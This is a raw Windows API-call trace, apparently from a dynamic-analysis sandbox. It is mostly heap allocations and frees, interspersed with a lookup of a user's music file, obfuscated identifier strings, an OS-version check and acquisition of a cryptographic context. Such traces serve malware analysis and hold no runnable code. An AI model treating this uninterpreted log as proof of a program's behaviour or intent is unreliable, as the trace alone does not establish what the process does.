RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0206.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0206.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0206.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0206.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0206.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e87710, ftCreationTime.dwHighDateTime=0x1d5cc5d, ftLastAccessTime.dwLowDateTime=0xea01f5d0, ftLastAccessTime.dwHighDateTime=0x1d5c93e, ftLastWriteTime.dwLowDateTime=0xea01f5d0, ftLastWriteTime.dwHighDateTime=0x1d5c93e, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0x0, dwReserved1=0x0, cFileName="JlLewkGtdwovoI.mp3", cAlternateFileName="JLLEWK~1.MP3")) returned 0x9e2138 [0206.076] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0206.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0206.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0206.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0206.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.079] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.079] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0206.079] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.080] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.081] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.081] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0206.081] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.082] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.082] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.082] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7040, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.083] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c7f8) returned 1 [0206.083] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0206.083] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0206.083] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.083] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.083] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0206.083] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0206.083] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.083] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.084] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.084] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.084] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.084] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.084] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.084] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.084] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.084] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.084] 